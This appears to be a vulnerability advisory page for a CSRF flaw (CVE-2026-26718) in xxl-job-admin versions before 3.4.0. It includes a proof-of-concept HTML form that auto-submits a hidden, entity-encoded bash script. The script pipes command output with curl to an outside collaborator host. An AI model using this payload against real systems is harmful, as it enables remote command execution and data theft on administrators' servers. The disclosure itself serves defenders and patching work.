Lucene search
+L

📄 xxl-job Cross Site Request Forgery

🗓️ 15 Jul 2026 00:00:00Reported by Ibrahim SartawiType 
packetstorm
 packetstorm
🔗 packetstorm.news👁 12 Views

CSRF in xxl-job-admin (<3.4.0) allows unauthorized Glue IDE shell script changes due to missing CSRF validation.

Related
Code
ReporterTitlePublishedViews
Family
attackerkb
CVE-2026-26718
15 Jul 202600:00
attackerkb
cve
CVE-2026-26718
15 Jul 202600:00
cve
cvelist
CVE-2026-26718
15 Jul 202600:00
cvelist
euvd
EUVD-2026-44843
16 Jul 202600:31
euvd
nvd
CVE-2026-26718
15 Jul 202622:16
nvd
ptsecurity
PT-2026-60330
15 Jul 202600:00
ptsecurity
vulnrichment
CVE-2026-26718
15 Jul 202600:00
vulnrichment
## Description
    # Summary
    A Cross-Site Request Forgery (CSRF) vulnerability exists in the xxl-job-admin web application that allows an attacker to perform unauthorized modifications to Glue IDE shell scripts. The affected endpoint lacks proper CSRF token validation and accepts arbitrary HTTP methods via a permissive request mapping
    
    # Affected Products
    
    ```text
    xxl-job < 3.4.0
    ```
    # Impact
    
    An attacker can trick an authenticated administrator into making unauthorized changes to Glue IDE shell scripts.
    
    # Proof of Concept
    
    <img width="1280" height="720" alt="Slide1" src="https://github.com/user-attachments/assets/630e6c5f-96ce-4e78-acdc-b65bd401d064" />
    
    <img width="1280" height="720" alt="Slide2" src="https://github.com/user-attachments/assets/8e4ecb6e-a837-48de-8718-d91f6418aa3a" />
    
    <img width="1280" height="720" alt="Slide3" src="https://github.com/user-attachments/assets/f7db38ac-ab21-4db1-b178-1d28fa4492ab" />
    
    <img width="1280" height="720" alt="Slide4" src="https://github.com/user-attachments/assets/9648c354-f35f-432f-baa0-3b29811772f8" />
    
    # Payload 
    
    ```text
    
    // Decode and change it 
    
    <html>
      <body>
        <form action="https://domain.com/jobcode/save">
          <input type="hidden" name="id" value="294" />
          <input type="hidden" name="glueSource" value="&#35;&#33;&#47;bin&#47;bash&#10;id&#32;&#124;&#32;curl&#32;&#45;d&#32;&#64;&#45;&#32;http&#58;&#47;&#47;qic8br6d6om2j459zk4evuimldr4f03p&#46;oastify&#46;com&#32;&#10;exit&#32;0&#10;" />
          <input type="hidden" name="glueRemark" value="12345" />
          <input type="submit" value="Submit request" />
        </form>
        <script>
          history.pushState('', '', '/');
          document.forms[0].submit();
        </script>
      </body>
    </html>
    
    ```
    Credits to
    Ibrahim Sartawi

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

15 Jul 2026 00:00Current
5.7Medium risk
Vulners AI Score5.7
CVSS 3.19.1
SSVC
12